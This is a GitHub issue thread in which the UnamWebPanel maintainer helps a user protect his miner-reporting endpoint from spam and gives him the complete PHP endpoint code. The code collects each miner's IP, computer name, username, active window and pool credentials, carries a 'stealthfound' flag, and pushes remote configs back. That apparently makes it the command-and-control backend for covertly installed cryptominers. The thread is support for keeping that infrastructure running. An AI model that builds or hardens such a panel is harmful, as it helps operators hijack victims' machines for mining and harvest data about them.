UnamSanctam / UnamWebPanel

MIT License
179 stars 57 forks source link

Unam Look at this #352

Closed tarekxxx closed 3 months ago

tarekxxx commented 7 months ago

i will sent to you in email since i cant sent code here to you to check it it will reduce this ddos query or no

UnamSanctam commented 7 months ago

You could potentially add a password/key to your endpoint, for example some code like this on line 10 in endpoint.php:

if(($_GET['key'] ?? '') != 'YOURLONGRANDOMKEY') {
     echo 'Invalid verification key.';
    die();
}

And then only miners that contact your web panel using the URL https://yourwebsite.com/api/endpoint.php?key=YOURLONGRANDOMKEY will be accepted.

I can't test it at the moment though.

tarekxxx commented 7 months ago

Let me check it now and tell you what happen

tarekxxx commented 7 months ago

i check but seems something happen the code should be look like this right ? i do edit from line 10 its was looking Like This Then I replace with your code

$hostAddress = $_SERVER["REMOTE_ADDR"] ?? '127.0.0.1'; $stmt = getConn()->prepare("SELECT 1 FROM ipblocking WHERE ipb_ip = ? LIMIT 1"); $blocked = $stmt->execute([$hostAddress]) && $stmt->fetch(); $stmt->closeCursor(); if ($blocked) { echo 'Your IP is blocked from connecting to this endpoint.'; die(); }

replace to

$data = json_decode(file_get_contents('php://input'), true); if(json_last_error() != JSON_ERROR_NONE) { echo 'Endpoint is up and running. This page is shown since no data was posted during the request or the data posted was invalid.'; die(); }

// Check verification key first (replace with actual key generation logic) if ((($_GET['key'] ?? '') != 'LONGKEYTHERE')) { echo 'Invalid verification key.'; die(); }

UnamSanctam commented 7 months ago

You should not replace anything, only add:

$data = json_decode(file_get_contents('php://input'), true);
if(json_last_error() != JSON_ERROR_NONE) {
    echo 'Endpoint is up and running. This page is shown since no data was posted during the request or the data posted was invalid.';
    die();
}

if((($_GET['key'] ?? '') != 'YOURLONGRANDOMKEY') {
     echo 'Invalid verification key.';
    die();
}

$hostAddress = $_SERVER["REMOTE_ADDR"] ?? '127.0.0.1';
$stmt = getConn()->prepare("SELECT 1 FROM ipblocking WHERE ipb_ip = ? LIMIT 1");
$blocked = $stmt->execute([$hostAddress]) && $stmt->fetch();
$stmt->closeCursor();
if ($blocked) {
    echo 'Your IP is blocked from connecting to this endpoint.';
    die();
}

Would be the code at the beginning.

tarekxxx commented 7 months ago

yea Looks Fine I Start SPam With NonSense Data But Nothing Appear At All and Real Miners Move to New Key! Thanks Man

tarekxxx commented 7 months ago

Oh Disconnect again nothing change

look at this edit i do this correct ?

$data = json_decode(file_get_contents('php://input'), true); if(json_last_error() != JSON_ERROR_NONE) { echo 'Endpoint is up and running. This page is shown since no data was posted during the request or the data posted was invalid.'; die(); }

if((($_GET['key'] ?? '') != 'LONGONE') { echo 'Invalid verification key.'; die(); }

$hostAddress = $_SERVER["REMOTE_ADDR"] ?? '127.0.0.1'; $stmt = getConn()->prepare("SELECT 1 FROM ipblocking WHERE ipb_ip = ? LIMIT 1"); $blocked = $stmt->execute([$hostAddress]) && $stmt->fetch(); $stmt->closeCursor(); if ($blocked) { echo 'Your IP is blocked from connecting to this endpoint.'; die(); }

UnamSanctam commented 7 months ago

Yes that's correct, what is disconnecting? Is the site itself (the webserver/webhost) going down due to a DDoS? Or are the miners just not connecting?

tarekxxx commented 7 months ago

yea Miner Not Connecting No DDos Nothing Appear Even When I Change to My New Key Its Nothing at all And Also No One Connect Back to WebPanel aswell NoDDOS

UnamSanctam commented 7 months ago

Since you're running your own custom testing program can you print out what the request your make returns?

tarekxxx commented 7 months ago

Response Status Code: OK Response Headers: X-Robots-Tag: noindex, nofollow Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Date: Mon, 08 Apr 2024 Server: Apache/2.4.58,(Win64),OpenSSL/3.1.3,PHP/8.2.12 X-Powered-By: PHP/8.2.12 Response Content:
Parse error: syntax error, unexpected token "echo" in C:\xampp\htdocs\api\endpoint.php on line 11
this after edit EndPoint

UnamSanctam commented 7 months ago

Looks like your code is wrong somewhere, I might've written something wrong since I'm not using an editor, this should be the full code:

<?php
/* Made by Unam Sanctam https://github.com/UnamSanctam */
require_once dirname(__DIR__).'/class/db.php';

$data = json_decode(file_get_contents('php://input'), true);
if(json_last_error() != JSON_ERROR_NONE) {
    echo 'Endpoint is up and running. This page is shown since no data was posted during the request or the data posted was invalid.';
    die();
}

if(($_GET['key'] ?? '') != 'LONGONE') {
    echo 'Invalid verification key.';
    die();
}

$hostAddress = $_SERVER["REMOTE_ADDR"] ?? '127.0.0.1';
$stmt = getConn()->prepare("SELECT 1 FROM ipblocking WHERE ipb_ip = ? LIMIT 1");
$blocked = $stmt->execute([$hostAddress]) && $stmt->fetch();
$stmt->closeCursor();
if ($blocked) {
    echo 'Your IP is blocked from connecting to this endpoint.';
    die();
}

function getData($key){
    global $data;
    return htmlspecialchars($data[$key] ?? '', ENT_QUOTES, 'UTF-8', false);
}

$uqhash = substr(md5(getData('computername').getData('cpu')), 0, 16);
$type = getData('type');
$id = getData('id');
$hashrate = round(is_numeric(getData('hashrate')) ? getData('hashrate') : 0.0, 2);

$fields = [
    'ms_ip'=>$hostAddress,
    'ms_status'=>getData('status'),
    'ms_computername'=>getData('computername'),
    'ms_username'=>getData('username'),
    'ms_hashrate'=>$hashrate,
    'ms_pool'=>getData('pool'),
    'ms_port'=>getData('port'),
    'ms_algorithm'=>getData('algo'),
    'ms_password'=>getData('password'),
    'ms_user'=>getData('user'),
    'ms_worker'=>getData('worker'),
    'ms_cpu'=>getData('cpu'),
    'ms_gpu'=>getData('gpu'),
    'ms_activewindow'=>getData('activewindow'),
    'ms_runtime'=>getData('runtime'),
    'ms_version'=>getData('version'),
    'ms_stealthfound'=>getData('stealthfound'),
    'ms_remoteURL'=>getData('remoteconfig'),
    'ms_extra'=>getData('extradata'),
    'ms_lastConnection'=>date('Y-m-d H:i:s')
];

try {
    $configConn = getConn()->prepare("SELECT * FROM miners INNER JOIN configs ON ms_config = cf_configID WHERE ms_uqhash = ? AND ms_rid = ? AND ms_type = ?");
    $configConn->execute([$uqhash, $id, $type]);
    $configRes = $configConn->fetch(PDO::FETCH_ASSOC);
    $configConn->closeCursor();

    $minerID = -1;
    if($configRes && $configRes['ms_minerID']){
        $minerID = $configRes['ms_minerID'];
        foreach($fields as $key=>$value) {
            if(isset($configRes[$key]) && $configRes[$key] == $value) {
                unset($fields[$key]);
            }
        }

        if(!empty($fields)) {
            $s = getConn()->prepare("UPDATE miners SET " . implode(' = ?, ', array_keys($fields)) . " = ? WHERE ms_minerID = ?");
            $s->execute(array_merge(array_values($fields), [$minerID]));
            $s->closeCursor();
        }
    } else {
        $s = getConn()->prepare("INSERT INTO miners (ms_uqhash, ms_rid, ms_type, ms_config, ".implode(', ', array_keys($fields)).") VALUES (?, ?, ?, ?".str_repeat(", ?", count($fields)).")");
        $s->execute(array_merge([$uqhash, $id, $type, ($type == 'xmrig' ? 1 : 2)], array_values($fields)));
        $minerID = getConn()->lastInsertId();
        $s->closeCursor();
    }

    if($config['hashrate_history'] && $minerID){
        if($config['hashrate_history_limit'] > 0) {
            $cleanHistory = getConn()->prepare("DELETE FROM hashrate WHERE ROWID IN (SELECT ROWID FROM (SELECT ROWID FROM hashrate WHERE hr_minerID = ? ORDER BY ROWID DESC LIMIT -1 OFFSET ?) AS x)");
            $cleanHistory->execute([$minerID, $config['hashrate_history_limit']-1]);
            $cleanHistory->closeCursor();
        }
        $addHistory = getConn()->prepare("INSERT INTO hashrate (hr_minerID, hr_algorithm, hr_hashrate, hr_date) VALUES (?, ?, ?, ?)");
        $addHistory->execute([$minerID, getData('algo'), floor($hashrate), strtotime(date('Y-m-d H:i:00'))]);
        $addHistory->closeCursor();
    }
}
catch(PDOException $e) {
    if($config['errorlog_enable']) {
        file_put_contents(dirname(__DIR__)."/__UNAM_LIB/Logs/endpoint-errors.log", "ENDPOINT ERROR: {$e->getMessage()}, LINE: {$e->getLine()}\r\n", FILE_APPEND);
    }
}

echo $configRes['cf_data'] ?? json_encode(['response'=>'ok']);
die();
tarekxxx commented 7 months ago

yea fine Now Working

UnamSanctam commented 7 months ago

Alright great, I think I might've added a parenthesis too much before.

tarekxxx commented 7 months ago

its okay its fine now thanks man this Help Aloot to reduce this